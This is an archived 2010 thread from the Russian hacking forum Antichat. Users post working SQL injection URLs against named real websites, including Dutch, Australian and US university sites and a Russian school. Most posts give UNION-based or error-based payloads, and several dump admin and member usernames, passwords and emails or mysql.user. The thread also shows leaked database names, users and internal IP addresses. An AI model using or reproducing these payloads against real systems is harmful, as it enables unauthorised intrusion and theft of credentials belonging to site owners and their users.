ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12231  
Старый 27.05.2010, 08:34
lzr
Новичок
Регистрация: 01.01.2009
Сообщений: 27
Провел на форуме:
125085

Репутация: 31
По умолчанию

Код:
http://lostandlonesome.com.au/release_detail.php?desc=bart-&amp-friends-make-you-blush&id=-1+union+select+1,2,3,concat_ws(0x3a3a3a,version(),database(),user()),5,6,7--
5.0.51a-3ubuntu5.4:::lostandlonesome_new:::lostlone@116.24 0.206.16

PR:4
 
Ответить с цитированием

  #12232  
Старый 27.05.2010, 11:03
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.jazzimpuls.nl
ТИЦ: 0
PR: 5
Код:
http://www.jazzimpuls.nl/show.php?id=-79'+union+select+1,2,unhex(hex(concat_ws(0x0b,version(),user(),database(),@@version_compile_os))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+
version - 4.1.11
user - jazzimpu_root@localhost
database - jazzimpu_user
os - redhat-linux-gnu

============================================

Сайт: http://www.doctordavidclark.com
ТИЦ: 0
PR: 4
Код:
http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,group_concat(0x0b,login,0x3a,pass),8,9,10+from+ddc_admin--+  

http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,now(),5,6,group_concat(0x0b,email,0x3a,pass),8,9,10+from+ddc_members--+  

http://www.doctordavidclark.com/cms.php?id=-3+union+select+1,2,3,now(),5,6,group_concat(0x0b,username,0x3a,user_password,0x3a,user_email),8,9,10+from+ddc_users--+
version - 5.0.91-log
user - nexdoctordavidDB@208.109.181.160
database - nexdoctordavidDB
os - unknown-linux-gnu

============================================

Сайт: http://www.gaycity.nl
ТИЦ: 0
PR: 3
Код:
http://www.gaycity.nl/shownw.php?id=-351'/*union*/union/*select*/select/**/1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+
version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32

============================================

Сайт: http://www.listenlive.nl
ТИЦ: 0
PR: 0
Код:
http://www.listenlive.nl/show.php?id=-19833+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,unhex(hex(group_concat(0x0b,user,0x3a,password))),20,21,22,23+from+mysql.user--+  

http://www.listenlive.nl/show.php?id=-19833+union+select+1,2,3,now(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,unhex(hex(group_concat(0x0b,username,0x3a,password,0x3a,email))),20,21,22,23+from+members--+
version - 5.0.37-log
user - stations@localhost
database - stations
os - unknown-linux-gnu
 
Ответить с цитированием

  #12233  
Старый 27.05.2010, 11:09
lzr
Новичок
Регистрация: 01.01.2009
Сообщений: 27
Провел на форуме:
125085

Репутация: 31
По умолчанию

Код:
http://www.4wdsystems.com.au/index.php?id=-1+union+select+1,concat_ws(0x3a3a3a,version(),database(),user()),3,4,5,6,7,8,9,10--
PR 2

5.0.90-community-log:::wc449836_db:::wc449836_jess@localhost
 
Ответить с цитированием

  #12234  
Старый 27.05.2010, 15:34
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

http://www.grate.ru/index.php?cat_id=-5+union+select+group_concat(0x0b,table_name),2,3,4 ,5,6,7,8,9,10+from+information_schema.tables--
 
Ответить с цитированием

  #12235  
Старый 27.05.2010, 15:49
lzr
Новичок
Регистрация: 01.01.2009
Сообщений: 27
Провел на форуме:
125085

Репутация: 31
По умолчанию

Код:
http://www.swiss.org.au/home.php?ID=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a3a,version(),database(),user()),10,11,12,13,14,15,16,17,18,19--
4.1.22-standard-log:::swisst db:::swisst@10.194.10.144

PR 4
 
Ответить с цитированием

  #12236  
Старый 27.05.2010, 17:59
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

едушки и все такое

PR>5

MS_ACCESS

http://www.cortland.edu/polsci/default.asp?page_id=-19+union+select+1,2,3+from+"table"

PR-6
---------------------------------
MSSQL

http://merritt.peralta.edu/apps/pubs.asp?Q=1+or+1=(select+top+1+@@version+from+inf ormation_schema.tables)--

@@version : Microsoft SQL Server 2005 - 9.00.3080.00

OS : Windows Server 2003

Platform : Intel X86

PR-6
--------------------------------
MS_ACCESS

http://www.ndus.edu/reports/details.asp?id=-245+union+select+1,username,3,4,5,6,7,8,9,10,11,12 ,13,14+from+"table"

PR-6
--------------------------------
MySQL

http://www.rch.org.au/plastic/edu.cfm?doc_id=-5860+union+select+1,2,3,4,aes_decrypt(aes_encrypt( concat_ws(0x3a,user(),version(),database(),@@versi on_compile_os),1),1),6,7+from+users/*

PR-6
--------------------------------
MSSQL
http://www.pace.edu/page.cfm?doc_id=14128&frame=news/read.cfm?id=829+or+1=@@version

PR-7
--------------------------------
MS_ACCESS

http://cooklibrary.towson.edu/getResourcesBySubject.cfm?subjectID=-77+union+select+1,2+from+"table"

PR-7
--------------------------------
http://historywired.si.edu/object.cfm?ID=123+or+1=@@version

@@version : Microsoft SQL Server 2008 (SP1) - 10.0.2531.0 (X64) Enterprise Edition

OS : Windows Server 2008 (x64)

PR-8
 
Ответить с цитированием

  #12237  
Старый 27.05.2010, 20:21
BrainDeaD
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
Провел на форуме:
3516666

Репутация: 439


По умолчанию

скромненько продолжу школьную тему

Код:
http://sch1265.ru/pages.php?id=-28+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5%20--
Database: sch1265_base
Version: 5.0.83-0ubuntu3
User: sch1265_sch1265@localhost
 
Ответить с цитированием

  #12238  
Старый 27.05.2010, 20:23
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

PR: 6
Код:
http://www.rso.cornell.edu/progressive/articles.php?id=196'+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10+LIMIT+1,1%23
PR: 6
Код:
http://news.mainemaritime.edu/articles.php?id=-26'+union+select+1,2,3,4,unhex(hex(version()))+--+
 
Ответить с цитированием

  #12239  
Старый 27.05.2010, 20:48
lzr
Новичок
Регистрация: 01.01.2009
Сообщений: 27
Провел на форуме:
125085

Репутация: 31
По умолчанию

PR 3
Код:
http://tnt.ya1.ru/interesno/gallery.php?id=-27+union+select+1,group_concat(uname,0x3a,upasswd),3,4,5+from+users--

Последний раз редактировалось lzr; 27.05.2010 в 20:51..
 
Ответить с цитированием

  #12240  
Старый 27.05.2010, 20:49
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://agenda.gaynews.nl
ТИЦ: 0
PR: 4
Код:
http://agenda.gaynews.nl/show.php?id=17349'+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,63),+floor(rand(0)*2)))--+
version - 4.1.22-community
user - gayamsterdam@SERVER1
database - master
os - Win32

============================================

Сайт: http://www.crew4you.nl
ТИЦ: 0
PR: 1
Код:
http://www.crew4you.nl/show.php?id=22'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+cfy_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+cr_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+dg_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+md_users--+&hid=0  

http://www.crew4you.nl/show.php?id=22'+union+select+1,now(),group_concat(0x0b,user,0x3a,password),4,5,6,7,8+from+dg_clients--+&hid=0
version - 5.1.45
user - forest_music@localhost
database - forest_music
os - redhat-linux-gnu

============================================

Сайт: http://www.tekcursus.nl
ТИЦ: 0
PR: 0
Код:
http://www.tekcursus.nl/website/show.php?formid=2+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,63),+floor(rand(0)*2)))--+
version - 4.1.12-standard
user - datekcursu_webdb@localhost
database - datekcursu_webdb
os - pc-linux-gnu

============================================

Устал я от этого msaccess'а, сливаю =\

============================================

Сайт: http://www.spokanemarcom.com
ТИЦ: 0
PR: 4
Код:
Вывод нескольких записей с перебором:
http://www.spokanemarcom.com/news.asp?id=-99+union+select+1,(select+top+1+username%2bchr(59)%2bpassword+from+members)%2bchr(58)%2b(select+top+1+username%2bchr(59)%2bpassword+from+members+where+username%2bchr(59)%2bpassword+not+in+(select+top+1+username%2bchr(59)%2bpassword+from+members)),3,4,5,6,7,8,9,10,11+from+members%00

Просто вывод с перебором:
http://www.spokanemarcom.com/news.asp?id=-99+union+select+top+1+1,username%2bchr(59)%2bpassword%2bchr(59)%2bemail,3,4,5,6,7,8,9,10,11+from+members+where+username%2bchr(59)%2bpassword%2bchr(59)%2bemail+not+in+(select+top+1+username%2bchr(59)%2bpassword%2bchr(59)%2bemail+from+members)+order+by+id%00
============================================

+ ещё парочка сайтов с этой субд..

============================================

Сайт: http://www.martinitiles.com
ТИЦ: 0
PR: 1
Код:
http://www.martinitiles.com/item2.php?id=197+union+select+1,2,data,4,5,6+from+msysaccessobjects+where+type=1%00
============================================

Сайт: http://www.uni-bright.com
ТИЦ: 0
PR: 1
Код:
http://www.uni-bright.com/item2.php?id=167+union+select+1,2,data,4,5,6+from+msysaccessobjects+where+type=1%00

Последний раз редактировалось aka_zver; 27.05.2010 в 20:53..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ